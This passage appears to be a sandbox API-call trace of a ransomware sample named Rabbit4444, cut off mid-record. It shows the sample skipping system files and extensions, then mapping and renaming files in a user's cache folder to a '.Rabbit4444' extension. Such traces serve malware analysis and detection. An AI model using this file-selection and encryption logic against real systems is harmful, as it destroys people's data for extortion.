lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8addc228, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0xdaf50849, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xeedee7bf, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.997] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.997] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.997] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.997] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.997] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.998] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeedee7bf, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeedee7bf, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeedee7bf, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.998] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.998] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.998] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xdad3a977, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xdad3a977, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xdad3a977, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0xba3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", cAlternateFileName="40E450~1")) returned 1 [0062.998] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.998] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.998] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="Rabbit4444.exe") returned -1 [0062.998] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2=".") returned 1 [0062.998] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="..") returned 1 [0062.998] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="windows") returned -1 [0062.998] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="bootmgr") returned -1 [0062.998] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="pagefile.sys") returned -1 [0062.998] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="boot") returned -1 [0062.998] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="ids.txt") returned -1 [0062.998] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="NTUSER.DAT") returned -1 [0062.998] lstrcpyW (in: lpString1=0x130ec1c, lpString2="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" | out: lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" [0062.998] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", dwFileAttributes=0x2020) returned 1 [0062.998] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", dwFileAttributes=0x2004) returned 1 [0062.998] lstrlenW (lpString="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned 65 [0062.998] lstrlenW (lpString="Rabbit4444") returned 10 [0062.999] lstrcmpiW (lpString1="9BDE565AF1", lpString2="Rabbit4444") returned -1 [0062.999] lstrlenW (lpString=".dll") returned 4 [0062.999] lstrcmpiW (lpString1="5AF1", lpString2=".dll") returned 1 [0062.999] lstrlenW (lpString=".lnk") returned 4 [0062.999] lstrcmpiW (lpString1="5AF1", lpString2=".lnk") returned 1 [0062.999] lstrlenW (lpString=".ini") returned 4 [0062.999] lstrcmpiW (lpString1="5AF1", lpString2=".ini") returned 1 [0062.999] lstrlenW (lpString=".sys") returned 4 [0062.999] lstrcmpiW (lpString1="5AF1", lpString2=".sys") returned 1 [0062.999] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0062.999] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.999] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15430983198) returned 1 [0062.999] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2979) returned 1 [0062.999] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0062.999] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0062.999] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xeb0, lpName=0x0) returned 0x27c [0063.000] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xeb0) returned 0x70000 [0063.001] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123820 [0063.001] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0063.001] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123820 | out: hHeap=0xe0000) returned 1 [0063.001] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0063.001] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0063.002] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0063.002] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0063.002] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0063.002] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15431253377) returned 1 [0063.002] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0063.002] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0063.002] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.002] CloseHandle (hObject=0x27c) returned 1 [0063.002] CloseHandle (hObject=0x2a0) returned 1 [0063.002] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.Rabbit4444") returned 190 [0063.002] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1.rabbit4444"), dwFlags=0x1) returned 1 [0063.003] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xdaf50849, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xdaf50849, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xdaf50849, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", cAlternateFileName="57C8ED~1")) returned 1 [0063.003] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.003] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.003] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="Rabbit4444.exe") returned -1 [0063.003] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2=".") returned 1 [0063.003] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="..") returned 1 [0063.003] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="windows") returned -1 [0063.003] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="bootmgr") returned -1 [0063.003] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="pagefile.sys") returned -1 [0063.003] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="boot") returned -1 [0063.003] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="ids.txt") returned -1 [0063.003] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="NTUSER.DAT") returned -1 [0063.003] lstrcpyW (in: lpString1=0x130ec1c, lpString2="57C8EDB95DF3F0AD4EE2DC2B8CFD4157" | out: lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="57C8EDB95DF3F0AD4EE2DC2B8CFD4157" [0063.003] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157", dwFileAttributes=0x2020) returned 1 [0063.003] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157", dwFileAttributes=0x2004) returned 1 [0063.004] lstrlenW (lpString="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned 32 [0063.004] lstrlenW (lpString="Rabbit4444") returned 10 [0063.004] lstrcmpiW (lpString1="2B8CFD4157", lpString2="Rabbit4444") returned -1 [0063.004] lstrlenW (lpString=".dll") returned 4 [0063.004] lstrcmpiW (lpString1="4157", lpString2=".dll") returned 1 [0063.004] lstrlenW (lpString=".lnk") returned 4 [0063.004] lstrcmpiW (lpString1="4157", lpString2=".lnk") returned 1 [0063.004] lstrlenW (lpString=".ini") returned 4 [0063.004] lstrcmpiW (lpString1="4157", lpString2=".ini") returned 1 [0063.004] lstrlenW (lpString=".sys") returned 4 [0063.004] lstrcmpiW (lpString1="4157", lpString2=".sys") returned 1 [0063.004] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xdaf50849, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xdaf50849, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xdaf50849, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="77EC63BDA74BD0D0E0426DC8F8008506", cAlternateFileName="77EC63~1")) returned 1 [0063.004] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.004] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.004] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="Rabbit4444.exe") returned -1 [0063.004] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2=".") returned 1 [0063.004] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="..") returned 1 [0063.004] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="windows") returned -1 [0063.004] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="bootmgr") returned -1 [0063.004] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="pagefile.sys") returned -1 [0063.004] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="boot") returned -1 [0063.004] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="ids.txt") returned -1 [0063.004] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="NTUSER.DAT") returned -1 [0063.004] lstrcpyW (in: lpString1=0x130ec1c, lpString2="77EC63BDA74BD0D0E0426DC8F8008506" | out: lpString1="77EC63BDA74BD0D0E0426DC8F8008506") returned="77EC63BDA74BD0D0E0426DC8F8008506" [0063.004] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506", dwFileAttributes=0x2020) returned 1 [0063.005] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506", dwFileAttributes=0x2004) returned 1 [0063.005] lstrlenW (lpString="77EC63BDA74BD0D0E0426DC8F8008506") returned 32 [0063.005] lstrlenW (lpString="Rabbit4444") returned 10 [0063.005] lstrcmpiW (lpString1="C8F8008506", lpString2="Rabbit4444") returned -1 [0063.005] lstrlenW (lpString=".dll") returned 4 [0063.005] lstrcmpiW (lpString1="8506", lpString2=".dll") returned 1 [0063.005] lstrlenW (lpString=".lnk") returned 4 [0063.005] lstrcmpiW (lpString1="8506", lpString2=".lnk") returned 1 [0063.005] lstrlenW (lpString=".ini") returned 4 [0063.005] lstrcmpiW (lpString1="8506", lpString2=".ini") returned 1 [0063.005] lstrlenW (lpString=".sys") returned 4 [0063.005] lstrcmpiW (lpString1="8506", lpString2=".sys") returned 1 [0063.005] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xdaf2a7e9, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xdaf2a7e9, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xdaf2a7e9, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x71c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", cAlternateFileName="B912B2~1")) returned 1 [0063.005] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.005] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.005] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2="Rabbit4444.exe") returned -1 [0063.005] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2=".") returned 1 [0063.005] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2="..") returned 1 [0063.005] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2="windows") returned -1 [0063.005] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2="bootmgr") returned -1 [0063.005] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2="pagefile.sys") returned -1 [0063.005] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2="boot") returned -1 [0063.005] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2="ids.txt") returned -1 [0063.005] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2="NTUSER.DAT") returned -1 [0063.005] lstrcpyW (in: lpString1=0x130ec1c, lpString2="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE" | out: lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE") returned="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE" [0063.006] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", dwFileAttributes=0x2020) returned 1 [0063.006] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", dwFileAttributes=0x2004) returned 1 [0063.006] lstrlenW (lpString="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE") returned 65 [0063.006] lstrlenW (lpString="Rabbit4444") returned 10 [0063.006] lstrcmpiW (lpString1="60981195AE", lpString2="Rabbit4444") returned -1 [0063.006] lstrlenW (lpString=".dll") returned 4 [0063.006] lstrcmpiW (lpString1="95AE", lpString2=".dll") returned 1 [0063.006] lstrlenW (lpString=".lnk") returned 4 [0063.006] lstrcmpiW (lpString1="95AE", lpString2=".lnk") returned 1 [0063.006] lstrlenW (lpString=".ini") returned 4 [0063.006] lstrcmpiW (lpString1="95AE", lpString2=".ini") returned 1 [0063.006] lstrlenW (lpString=".sys") returned 4 [0063.006] lstrcmpiW (lpString1="95AE", lpString2=".sys") returned 1 [0063.006] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\content\\b912b2c6928a18b8cd7d50cf08bea95b_e0ddba93f290048b39ab8760981195ae"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0063.007] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0063.007] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15431731096) returned 1 [0063.007] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1820) returned 1 [0063.007] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0063.007] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101628 [0063.007] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa20, lpName=0x0) returned 0x27c [0063.009] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa20) returned 0x70000 [0063.010] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123820 [0063.010] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0063.010] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123820 | out: hHeap=0xe0000) returned 1 [0063.011] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0063.011] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0063.011] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0063.011] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0063.011] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0063.011] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15432165395) returned 1 [0063.011] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0063.011] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101628 | out: hHeap=0xe0000) returned 1 [0063.011] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.011] CloseHandle (hObject=0x27c) returned 1 [0063.011] CloseHandle (hObject=0x2a0) returned 1 [0063.011] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE.Rabbit4444") returned 190 [0063.011] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\content\\b912b2c6928a18b8cd7d50cf08bea95b_e0ddba93f290048b39ab8760981195ae"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\content\\b912b2c6928a18b8cd7d50cf08bea95b_e0ddba93f290048b39ab8760981195ae.rabbit4444"), dwFlags=0x1) returned 1 [0063.012] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x8addc228, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x8addc228, ftLastAccessTime.dwHighDateTime=0x1d32716, ftLastWriteTime.dwLowDateTime=0xdc23c122, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", cAlternateFileName="C46E7B~1")) returned 1 [0063.012] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.012] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.012] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="Rabbit4444.exe") returned -1 [0063.012] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2=".") returned 1 [0063.012] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="..") returned 1 [0063.012] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="windows") returned -1 [0063.012] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="bootmgr") returned 1 [0063.012] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", 